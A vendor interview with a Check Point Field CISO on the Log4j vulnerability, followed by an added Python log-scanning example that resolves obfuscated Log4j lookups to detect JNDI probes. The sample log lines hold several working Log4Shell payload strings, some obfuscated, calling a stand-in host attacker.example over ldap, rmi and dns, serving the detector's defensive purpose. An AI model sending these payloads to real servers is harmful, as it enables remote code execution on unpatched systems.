Pete has 32 years of Security, Network, and MSSP experience and recently joined Check Point as Field CISO of the Americas. Pete’s cloud security deployments and designs have been rated by Gartner as #1 and #2 in the world, and he literally “wrote the book” on the subject, contributing to the secure cloud reference designs published by Intel Press in “Building the Infrastructure for Cloud Security: A Solutions View.”

In this interview, CISO Pete Nicoletti provides powerful, pack-a-punch CISO-level insight into the Log4j vulnerability.

We have a lot to cover here and news is developing almost every minute…What does a CISO need to know right now about Log4j?

It’s the worst possible combination for an attack…easy to exploit and everything/everywhere is vulnerable. Kiddie scripters can craft the attack…and the blast radius is huge. This is going to affect millions.  Almost every company that develops software leverages this code library. Organizations may have this vulnerability baked into their code, that of their hosting provider, or that of their hardware manufacturer.

Thankfully, Minecraft users and noisy crypto miner hackers on the interweb noticed this vulnerability quickly; otherwise nation-states and other sophisticated hacking gangs would have exploited it for their nefarious purposes before anyone could have seen it coming.

Let’s talk about what it is…no one has ever heard about this function…

Log4j is the most frequently used logging library in Apache Linux distro. It’s been downloaded millions of times. However, as we’ve learned in the last few weeks, it has a serious flaw in the way it handles certain character strings. The compromise is delivered with as few as 25 characters. To perform remote code execution, an attacker only needs to send a simple malicious request that contains a formatted string which is then picked up by the Log4j library. The vulnerability occurs due to a lack of sanitization in the lookup method used in the Log4j library. An attacker can leverage JNDI (Java Naming and Directory Interface) to perform a request to a remote malicious resource.

The US Federal government’s Cybersecurity and Infrastructure Security Agency (CISA) gave this attack a rating of 10/10…the highest risk.

How can this attack be stopped?

In the short term, patching. In the long run, the best way to prevent this attack and other similar attacks involves use of an autonomous, multi-layer Gen 5 artificial intelligence-based prevention approach.  Some tools work “pre-emptively”, some tools work only after a signature update, and other tools only show evidence after the secondary exploit.

Pre-emptively? What does that mean?

It’s simple: you prevent the attack without any awareness of its tactics or vector…that’s called “Pre-emptive” prevention. Having pre-emptive zero day capabilities and extremely fast reacting signature development is part of a strong vendor-based prevention strategy.

There is talk that the vulnerability was being used by hackers for some time…what about historical analysis?

The first evidence reported pertaining to this threat emerged on December 1st. Public disclosures were made nine days later. A BlackHat presentation hinted at the issue in 2016, but it wasn’t until December 9th 2021 that the entire world found out about it…We will start seeing reports of companies compromised during the first week of December, as hackers gained footholds, established persistence, etc.

How can you tell if your organization is vulnerable?

Assume that you are…as we are all vulnerable to this issue, some just have more exposure and risk than others. Your software dev teams will run scanners against each server with the latest updates to find this flaw.  All the usual scanning companies can find it.  You also should use software code scanning tools from Check Point.
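The interview describes the mechanism (a formatted lookup string in a request that Log4j resolves via JNDI) and recommends scanning to find exposure. The following is an added worked example, not part of the interview and not code from Check Point or Pete Nicoletti: a small detector that runs over request-log lines and flags lookup strings that resolve to a JNDI lookup, including the common disguises attackers used (nested lookups, `${lower:…}`/`${upper:…}` case tricks, and the `${key:-default}` default-value syntax) rather than matching only the literal text `${jndi:`. The log lines, host names and scheme list are constructed for the example. It is a triage aid for historical-log review, not a substitute for patching or for a vulnerability scanner that checks the library version actually deployed.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample request-log lines (made up for this example; not from the
# original page or any real system). The last field is the User-Agent header,
# one of the common places the malicious lookup string was delivered.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NO_SUCH_VAR:-j}ndi:dns://attacker.example/d}"',
    '10.0.0.10 - - "GET /?day=${date:yyyy-MM-dd} HTTP/1.1" 200 "curl/7.79"',
]

# An innermost ${...} lookup: a body containing no further '$', '{' or '}'.
INNERMOST_LOOKUP = re.compile(r'\$\{([^${}]*)\}')
# Once lookups are resolved, the dangerous text has the shape jndi:<scheme>:...
JNDI_SCHEME = re.compile(r'jndi:([a-z0-9+.-]+):', re.IGNORECASE)


def resolve_lookup(body: str) -> str:
    """Return the text a single Log4j lookup body evaluates to, for the subset
    of lookups attackers used to disguise the string 'jndi:'."""
    lowered = body.lower()
    if lowered.startswith('jndi:'):
        return body                            # keep the dangerous lookup visible
    if ':-' in body:                           # ${key:-default} -> default
        return body.split(':-', 1)[1]
    if lowered.startswith('lower:'):
        return body[len('lower:'):].lower()
    if lowered.startswith('upper:'):
        return body[len('upper:'):].upper()
    return body                                # unknown lookup: keep its text, drop the braces


def normalize(text: str, max_rounds: int = 16) -> str:
    """Resolve innermost lookups repeatedly until the text stops changing.
    max_rounds bounds the work on pathological nesting depth."""
    for _ in range(max_rounds):
        resolved = INNERMOST_LOOKUP.sub(lambda m: resolve_lookup(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi(line: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a lookup
    that resolves to 'jndi:', otherwise None."""
    match = JNDI_SCHEME.search(normalize(line))
    return match.group(1).lower() if match else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, scheme) for every line that resolves to a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        scheme = find_jndi(line)
        if scheme is not None:
            hits.append((index, scheme))
    return hits


if __name__ == '__main__':
    for index, scheme in scan(SAMPLE_LOG_LINES):
        print(f'line {index}: lookup resolves to a JNDI request over {scheme}')
```

Lines 1 through 4 of the sample are flagged (ldap, ldap, rmi, dns); the plain browser request and the benign `${date:…}` lookup are not. Resolving lookups before matching is the point: a grep for the literal `${jndi:` would miss three of the four hits above. Run this over web, proxy and application logs from the window the interview mentions (early December onward) to find probing attempts, and treat any hit against a host that was running an unpatched Log4j as a candidate compromise to investigate, not merely a blocked scan.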

Did you like this content? See an outstanding Livestream version of this interview and more, right here.

Lastly, to learn more about pressing issues in the cyber world, please join us at the premiere cyber security event of the year – CPX 360 2022. Register here.